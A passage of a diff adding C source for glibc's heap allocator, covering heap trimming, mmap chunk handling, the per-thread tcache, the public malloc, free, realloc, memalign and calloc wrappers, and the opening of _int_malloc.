+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore MORECORE return value,
+         and instead call again to find out where new end of memory is.
+         This avoids problems if first call releases less than we asked,
+         of if failure somehow altered brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
+
+static void
+munmap_chunk (mchunkptr p)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  /* Do nothing if the chunk is a faked mmapped chunk in the dumped
+     main arena.  We never free this memory.  */
+  if (DUMPED_MAIN_ARENA_CHUNK (p))
+    return;
+
+  uintptr_t mem = (uintptr_t) chunk2mem (p);
+  uintptr_t block = (uintptr_t) p - prev_size (p);
+  size_t total_size = prev_size (p) + size;
+  /* Unfortunately we have to do the compilers job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (in the moment at least) so we combine the two values into one before
+     the bit test.  */
+  if (__glibc_unlikely ((block | total_size) & (pagesize - 1)) != 0
+      || __glibc_unlikely (!powerof2 (mem & (pagesize - 1))))
+    malloc_printerr ("munmap_chunk(): invalid pointer");
+
+  atomic_decrement (&mp_.n_mmaps);
+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap failed the process virtual memory address space is in a
+     bad shape.  Just leave the block hanging around, the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
+
+#if HAVE_MREMAP
+
+static mchunkptr
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = prev_size (p);
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+
+  uintptr_t block = (uintptr_t) p - offset;
+  uintptr_t mem = (uintptr_t) chunk2mem(p);
+  size_t total_size = offset + size;
+  if (__glibc_unlikely ((block | total_size) & (pagesize - 1)) != 0
+      || __glibc_unlikely (!powerof2 (mem & (pagesize - 1))))
+    malloc_printerr("mremap_chunk(): invalid pointer");
+
+  /* Note the extra SIZE_SZ overhead as in mmap_chunk(). */
+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (total_size == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) block, total_size, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert (prev_size (p) == offset);
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+#if USE_TCACHE
+
+/* We overlay this structure on the user-data portion of a chunk when
+   the chunk is stored in the per-thread cache.  */
+typedef struct tcache_entry
+{
+  struct tcache_entry *next;
+  /* This field exists to detect double frees.  */
+  struct tcache_perthread_struct *key;
+} tcache_entry;
+
+/* There is one of these for each thread, which contains the
+   per-thread cache (hence "tcache_perthread_struct").  Keeping
+   overall size low is mildly important.  Note that COUNTS and ENTRIES
+   are redundant (we could have just counted the linked list each
+   time), this is for performance reasons.  */
+typedef struct tcache_perthread_struct
+{
+  uint16_t counts[TCACHE_MAX_BINS];
+  tcache_entry *entries[TCACHE_MAX_BINS];
+} tcache_perthread_struct;
+
+static __thread bool tcache_shutting_down = false;
+static __thread tcache_perthread_struct *tcache = NULL;
+
+/* Caller must ensure that we know tc_idx is valid and there's room
+   for more chunks.  */
+static __always_inline void
+tcache_put (mchunkptr chunk, size_t tc_idx)
+{
+  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
+
+  /* Mark this chunk as "in the tcache" so the test in _int_free will
+     detect a double free.  */
+  e->key = tcache;
+
+  e->next = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e;
+  ++(tcache->counts[tc_idx]);
+}
+
+/* Caller must ensure that we know tc_idx is valid and there's
+   available chunks to remove.  */
+static __always_inline void *
+tcache_get (size_t tc_idx)
+{
+  tcache_entry *e = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e->next;
+  --(tcache->counts[tc_idx]);
+  e->key = NULL;
+  return (void *) e;
+}
+
+static void
+tcache_thread_shutdown (void)
+{
+  int i;
+  tcache_perthread_struct *tcache_tmp = tcache;
+
+  if (!tcache)
+    return;
+
+  /* Disable the tcache and prevent it from being reinitialized.  */
+  tcache = NULL;
+  tcache_shutting_down = true;
+
+  /* Free all of the entries and the tcache itself back to the arena
+     heap for coalescing.  */
+  for (i = 0; i < TCACHE_MAX_BINS; ++i)
+    {
+      while (tcache_tmp->entries[i])
+	{
+	  tcache_entry *e = tcache_tmp->entries[i];
+	  tcache_tmp->entries[i] = e->next;
+	  __libc_free (e);
+	}
+    }
+
+  __libc_free (tcache_tmp);
+}
+
+static void
+tcache_init(void)
+{
+  mstate ar_ptr;
+  void *victim = 0;
+  const size_t bytes = sizeof (tcache_perthread_struct);
+
+  if (tcache_shutting_down)
+    return;
+
+  arena_get (ar_ptr, bytes);
+  victim = _int_malloc (ar_ptr, bytes);
+  if (!victim && ar_ptr != NULL)
+    {
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  /* In a low memory situation, we may not be able to allocate memory
+     - in which case, we just keep trying later.  However, we
+     typically do this very early, so either there is sufficient
+     memory, or there isn't enough memory to do non-trivial
+     allocations anyway.  */
+  if (victim)
+    {
+      tcache = (tcache_perthread_struct *) victim;
+      memset (tcache, 0, sizeof (tcache_perthread_struct));
+    }
+
+}
+
+# define MAYBE_INIT_TCACHE() \
+  if (__glibc_unlikely (tcache == NULL)) \
+    tcache_init();
+
+#else  /* !USE_TCACHE */
+# define MAYBE_INIT_TCACHE()
+
+static void
+tcache_thread_shutdown (void)
+{
+  /* Nothing to do if there is no thread cache.  */
+}
+
+#endif /* !USE_TCACHE  */
+
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  _Static_assert (PTRDIFF_MAX <= SIZE_MAX / 2,
+                  "PTRDIFF_MAX is not more than half of SIZE_MAX");
+
+  void *(*hook) (size_t, const void *)
+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+#if USE_TCACHE
+  /* int_free also calls request2size, be careful to not pad twice.  */
+  size_t tbytes;
+  if (!checked_request2size (bytes, &tbytes))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
+  size_t tc_idx = csize2tidx (tbytes);
+
+  MAYBE_INIT_TCACHE ();
+
+  DIAG_PUSH_NEEDS_COMMENT;
+  if (tc_idx < mp_.tcache_bins
+      && tcache
+      && tcache->counts[tc_idx] > 0)
+    {
+      return tcache_get (tc_idx);
+    }
+  DIAG_POP_NEEDS_COMMENT;
+#endif
+
+  if (SINGLE_THREAD_P)
+    {
+      victim = _int_malloc (&main_arena, bytes);
+      assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (victim)));
+      return victim;
+    }
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
+
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* See if the dynamic brk/mmap threshold needs adjusting.
+	 Dumped fake mmapped chunks do not affect the threshold.  */
+      if (!mp_.no_dyn_threshold
+          && chunksize_nomask (p) > mp_.mmap_threshold
+          && chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX
+	  && !DUMPED_MAIN_ARENA_CHUNK (p))
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
+      munmap_chunk (p);
+      return;
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    {
+      MAYBE_INIT_TCACHE ();
+      ar_ptr = arena_for_chunk (oldp);
+    }
+
+  /* Little security check which won't hurt performance: the allocator
+     never wrapps around at the end of the address space.  Therefore
+     we can exclude some size values which might appear here by
+     accident or by "design" from some intruder.  We need to bypass
+     this check for dumped fake mmap chunks from the old main arena
+     because the new malloc may provide additional alignment.  */
+  if ((__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+       || __builtin_expect (misaligned_chunk (oldp), 0))
+      && !DUMPED_MAIN_ARENA_CHUNK (oldp))
+      malloc_printerr ("realloc(): invalid pointer");
+
+  if (!checked_request2size (bytes, &nb))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
+
+  if (chunk_is_mmapped (oldp))
+    {
+      /* If this is a faked mmapped chunk from the dumped main arena,
+	 always make a copy (and do not free the old chunk).  */
+      if (DUMPED_MAIN_ARENA_CHUNK (oldp))
+	{
+	  /* Must alloc, copy, free. */
+	  void *newmem = __libc_malloc (bytes);
+	  if (newmem == 0)
+	    return NULL;
+	  /* Copy as many bytes as are available from the old chunk
+	     and fit into the new size.  NB: The overhead for faked
+	     mmapped chunks is only SIZE_SZ, not 2 * SIZE_SZ as for
+	     regular mmapped chunks.  */
+	  if (bytes > oldsize - SIZE_SZ)
+	    bytes = oldsize - SIZE_SZ;
+	  memcpy (newmem, oldmem, bytes);
+	  return newmem;
+	}
+
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+      assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+	      ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+      return newp;
+    }
+
+  __libc_lock_lock (ar_ptr->mutex);
+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  __libc_lock_unlock (ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
+libc_hidden_def (__libc_realloc)
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      p = _int_memalign (&main_arena, alignment, bytes);
+      assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (p)));
+
+      return p;
+    }
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes;
+  /* ALIGN_UP with overflow check.  */
+  if (__glibc_unlikely (__builtin_add_overflow (bytes,
+						pagesize - 1,
+						&rounded_bytes)))
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+  rounded_bytes = rounded_bytes & -(pagesize - 1);
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
+  INTERNAL_SIZE_T sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
+  INTERNAL_SIZE_T *d;
+  ptrdiff_t bytes;
+
+  if (__glibc_unlikely (__builtin_mul_overflow (n, elem_size, &bytes)))
+    {
+       __set_errno (ENOMEM);
+       return NULL;
+    }
+  sz = bytes;
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  if (SINGLE_THREAD_P)
+    av = &main_arena;
+  else
+    arena_get (av, sz);
+
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (!SINGLE_THREAD_P)
+    {
+      if (mem == 0 && av != NULL)
+	{
+	  LIBC_PROBE (memory_calloc_retry, 1, sz);
+	  av = arena_get_retry (av, sz);
+	  mem = _int_malloc (av, sz);
+	}
+
+      if (av != NULL)
+	__libc_lock_unlock (av->mutex);
+    }
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 if 8byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+#if USE_TCACHE
+  size_t tcache_unsorted_count;	    /* count of unsorted chunks processed */
+#endif
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size returns false for request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
+
+  if (!checked_request2size (bytes, &nb))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
+
+#define REMOVE_FB(fb, victim, pp)			\
+  do							\
+    {							\
+      victim = pp;					\
+      if (victim == NULL)				\
+	break;						\
+    }							\
+  while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim)) \
+	 != victim);					\
+
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp;
+      victim = *fb;
+
+      if (victim != NULL)
+	{
+	  if (SINGLE_THREAD_P)
+	    *fb = victim->fd;
+	  else
+	    REMOVE_FB (fb, pp, victim);
+	  if (__glibc_likely (victim != NULL))
+	    {
+	      size_t victim_idx = fastbin_index (chunksize (victim));
+	      if (__builtin_expect (victim_idx != idx, 0))
+		malloc_printerr ("malloc(): memory corruption (fast)");
+	      check_remalloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	      /* While we're here, if we see other chunks of the same size,
+		 stash them in the tcache.  */
+	      size_t tc_idx = csize2tidx (nb);
+	      if (tcache && tc_idx < mp_.tcache_bins)
+		{
+		  mchunkptr tc_victim;
+
+		  /* While bin not empty and tcache not full, copy chunks.  */
+		  while (tcache->counts[tc_idx] < mp_.tcache_count
+			 && (tc_victim = *fb) != NULL)
+		    {
+		      if (SINGLE_THREAD_P)
+			*fb = tc_victim->fd;
+		      else
+			{
+			  REMOVE_FB (fb, pp, tc_victim);
+			  if (__glibc_unlikely (tc_victim == NULL))
+			    break;
+			}
+		      tcache_put (tc_victim, tc_idx);
+		    }
+		}
+#endif
+	      void *p = chunk2mem (victim);
+	      alloc_perturb (p, bytes);
+	      return p;
+	    }
+	}
+    }
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
+     processed to find best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          bck = victim->bk;
+	  if (__glibc_unlikely (bck->fd != victim))
+	    malloc_printerr ("malloc(): smallbin double linked list corrupted");
+          set_inuse_bit_at_offset (victim, nb);
+          bin->bk = bck;
+          bck->fd = bin;
+
+          if (av != &main_arena)
+	    set_non_main_arena (victim);
+          check_malloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	  /* While we're here, if we see other chunks of the same size,
+	     stash them in the tcache.  */
+	  size_t tc_idx = csize2tidx (nb);
+	  if (tcache && tc_idx < mp_.tcache_bins)
+	    {
+	      mchunkptr tc_victim;
+
+	      /* While bin not empty and tcache not full, copy chunks over.  */
+	      while (tcache->counts[tc_idx] < mp_.tcache_count
+		     && (tc_victim = last (bin)) != bin)
+		{
+		  if (tc_victim != 0)
+		    {
+		      bck = tc_victim->bk;
+		      set_inuse_bit_at_offset (tc_victim, nb);
+		      if (av != &main_arena)
+			set_non_main_arena (tc_victim);
+		      bin->bk = bck;
+		      bck->fd = bin;
+
+		      tcache_put (tc_victim, tc_idx);
+	            }
+		}
+	    }
+#endif
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs. And the programs that
+     it is called frequently in otherwise tend to fragment.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (atomic_load_relaxed (&av->have_fastchunks))
+        malloc_consolidate (av);
+    }
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is exact fit, or, if this a small request, the chunk is remainder from
+     the most recent non-exact fit.  Place other traversed chunks in
+     bins.  Note that this step is the only place in any routine where
+     chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+#if USE_TCACHE
+  INTERNAL_SIZE_T tcache_nb = 0;
+  size_t tc_idx = csize2tidx (nb);
+  if (tcache && tc_idx < mp_.tcache_bins)
+    tcache_nb = nb;
+  int return_cached = 0;
+
+  tcache_unsorted_count = 0;
+#endif
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          size = chunksize (victim);
+          mchunkptr next = chunk_at_offset (victim, size);
+
+          if (__glibc_unlikely (size <= 2 * SIZE_SZ)
+              || __glibc_unlikely (size > av->system_mem))
+            malloc_printerr ("malloc(): invalid size (unsorted)");
+          if (__glibc_unlikely (chunksize_nomask (next) < 2 * SIZE_SZ)
+              || __glibc_unlikely (chunksize_nomask (next) > av->system_mem))
+            malloc_printerr ("malloc(): invalid next size (unsorted)");
+          if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))
+            malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
+          if (__glibc_unlikely (bck->fd != victim)
+              || __glibc_unlikely (victim->fd != unsorted_chunks (av)))
+            malloc_printerr ("malloc(): unsorted double linked list corrupted");
+          if (__glibc_unlikely (prev_inuse (next)))
+            malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");
+
+          /*
+             If a small request, try to use last remainder if it is the
+             only chunk in unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
+
+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          if (__glibc_unlikely (bck->fd != victim))
+            malloc_printerr ("malloc(): corrupted unsorted chunks 3");
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+#if USE_TCACHE
+	      /* Fill cache first, return to user only if cache fills.
+		 We may return one of these chunks later.  */
+	      if (tcache_nb
+		  && tcache->counts[tc_idx] < mp_.tcache_count)
+		{
+		  tcache_put (victim, tc_idx);
+		  return_cached = 1;
+		  continue;
+		}
+	      else
+		{
+#endif
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+#if USE_TCACHE
+		}
+#endif
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
